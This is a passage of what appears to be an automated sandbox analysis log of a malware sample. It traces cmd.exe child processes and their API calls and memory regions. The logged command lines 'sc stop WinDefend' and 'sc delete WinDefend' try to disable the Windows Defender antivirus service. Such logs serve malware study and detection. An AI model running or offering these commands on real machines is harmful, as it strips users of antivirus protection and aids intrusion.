returned 0x2 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x1, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x1, lpcbData=0x32e9a0*=0x1000) returned 0x2 [0120.325] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x0, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.326] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x9, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.326] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x4, lpData=0x32e9a8*=0x9, lpcbData=0x32e9a0*=0x4) returned 0x0 [0120.326] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e9a4, lpData=0x32e9a8, lpcbData=0x32e9a0*=0x1000 | out: lpType=0x32e9a4*=0x0, lpData=0x32e9a8*=0x9, lpcbData=0x32e9a0*=0x1000) returned 0x2 [0120.326] RegCloseKey (hKey=0x68) returned 0x0 [0120.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a260 [0120.326] srand (_Seed=0x5c09a260) [0120.326] GetCommandLineW () returned="/c sc stop WinDefend" [0120.326] GetCommandLineW () returned="/c sc stop WinDefend" [0120.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.327] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b4778, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.327] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.327] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.327] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.328] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.328] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.328] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.328] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.328] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.328] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.328] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.328] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f768 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x32f768, lpFilePart=0x32f764 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x32f764*="system32") returned 0x13 [0120.328] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.328] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x32f4e4 | out: lpFindFileData=0x32f4e4) returned 0x3b4988 [0120.328] FindClose (in: hFindFile=0x3b4988 | out: hFindFile=0x3b4988) returned 1 [0120.328] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x32f4e4 | out: lpFindFileData=0x32f4e4) returned 0x3b2b10 [0120.328] FindClose (in: hFindFile=0x3b2b10 | out: hFindFile=0x3b2b10) returned 1 [0120.328] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.328] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0120.329] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0120.329] GetEnvironmentStringsW () returned 0x3b2b10* [0120.329] FreeEnvironmentStringsW (penv=0x3b2b10) returned 1 [0120.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.329] GetConsoleOutputCP () returned 0x1b5 [0120.329] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.329] GetUserDefaultLCID () returned 0x409 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f8a8, cchData=128 | out: lpLCData="0") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f8a8, cchData=128 | out: lpLCData="0") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f8a8, cchData=128 | out: lpLCData="1") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0120.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0120.331] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.332] GetConsoleTitleW (in: lpConsoleTitle=0x3b2b48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.389] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.389] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0120.389] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0120.389] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0120.390] _wcsicmp (_String1="sc", _String2=")") returned 74 [0120.390] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0120.390] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0120.390] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0120.390] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0120.390] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0120.390] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0120.391] GetConsoleTitleW (in: lpConsoleTitle=0x32f5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.392] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0120.392] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0120.392] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0120.392] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0120.392] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0120.392] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0120.392] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0120.392] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0120.392] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0120.392] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0120.392] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0120.392] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0120.392] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0120.392] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0120.392] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0120.392] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0120.392] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0120.392] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0120.392] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0120.392] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0120.392] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0120.392] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0120.392] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0120.392] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0120.392] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0120.392] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0120.392] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0120.392] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0120.393] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0120.393] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0120.393] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0120.393] _wcsicmp (_String1="sc", _String2="START") returned -17 [0120.393] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0120.393] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0120.393] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0120.393] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0120.393] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0120.393] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0120.393] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0120.393] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0120.393] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0120.393] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0120.393] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0120.393] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0120.393] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0120.393] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0120.393] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0120.393] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0120.393] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0120.393] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0120.393] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0120.393] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0120.393] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0120.393] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0120.393] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0120.393] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0120.393] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0120.393] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0120.393] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0120.393] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0120.393] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0120.393] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0120.394] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0120.394] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0120.394] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0120.394] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0120.394] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0120.394] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0120.394] _wcsicmp (_String1="sc", _String2="START") returned -17 [0120.394] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0120.394] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0120.394] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0120.394] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0120.394] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0120.394] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0120.394] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0120.394] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0120.394] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0120.394] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0120.394] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0120.394] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0120.394] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0120.394] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0120.394] SetErrorMode (uMode=0x0) returned 0x0 [0120.394] SetErrorMode (uMode=0x1) returned 0x0 [0120.394] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b3048, lpFilePart=0x32f0c0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x32f0c0*="system32") returned 0x13 [0120.395] SetErrorMode (uMode=0x0) returned 0x1 [0120.395] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.395] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.402] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x32ee3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ee3c) returned 0x3b33c8 [0120.402] FindClose (in: hFindFile=0x3b33c8 | out: hFindFile=0x3b33c8) returned 1 [0120.403] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x32ee3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ee3c) returned 0xffffffff [0120.403] GetLastError () returned 0x2 [0120.403] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ee3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ee3c) returned 0x3b33c8 [0120.403] FindClose (in: hFindFile=0x3b33c8 | out: hFindFile=0x3b33c8) returned 1 [0120.403] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.403] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.403] GetConsoleTitleW (in: lpConsoleTitle=0x32f334, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.404] InitializeProcThreadAttributeList (in: lpAttributeList=0x32f1bc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f284 | out: lpAttributeList=0x32f1bc, lpSize=0x32f284) returned 1 [0120.404] UpdateProcThreadAttribute (in: lpAttributeList=0x32f1bc, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f27c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32f1bc, lpPreviousValue=0x0) returned 1 [0120.404] GetStartupInfoW (in: lpStartupInfo=0x32f178 | out: lpStartupInfo=0x32f178*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.404] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="WecVers", _MaxCount=0x7) returned -20 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.405] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.406] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.407] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x32f218*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f264 | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x32f264*(hProcess=0x78, hThread=0x74, dwProcessId=0x350, dwThreadId=0x6e4)) returned 1 [0120.413] CloseHandle (hObject=0x74) returned 1 [0120.413] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.413] GetEnvironmentStringsW () returned 0x3b4988* [0120.413] FreeEnvironmentStringsW (penv=0x3b4988) returned 1 [0120.413] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0120.793] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x32f158 | out: lpExitCode=0x32f158*=0x5) returned 1 [0120.794] CloseHandle (hObject=0x78) returned 1 [0120.794] _vsnwprintf (in: _Buffer=0x32f2a0, _BufferCount=0x13, _Format="%08X", _ArgList=0x32f164 | out: _Buffer="00000005") returned 8 [0120.794] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1 [0120.794] GetEnvironmentStringsW () returned 0x3b8df8* [0120.794] FreeEnvironmentStringsW (penv=0x3b8df8) returned 1 [0120.794] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.794] GetEnvironmentStringsW () returned 0x3b8df8* [0120.794] FreeEnvironmentStringsW (penv=0x3b8df8) returned 1 [0120.794] DeleteProcThreadAttributeList (in: lpAttributeList=0x32f1bc | out: lpAttributeList=0x32f1bc) [0120.794] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.794] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.794] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.794] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0120.794] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.794] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0120.795] SetConsoleInputExeNameW () returned 0x1 [0120.795] GetConsoleOutputCP () returned 0x1b5 [0120.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.795] exit (_Code=5) Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1703000" os_pid = "0x8b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x698" cmd_line = "/c sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1545 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1546 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1547 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1548 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1549 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1550 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1551 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1552 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1553 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1554 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1555 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1556 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1557 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1558 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1559 start_va = 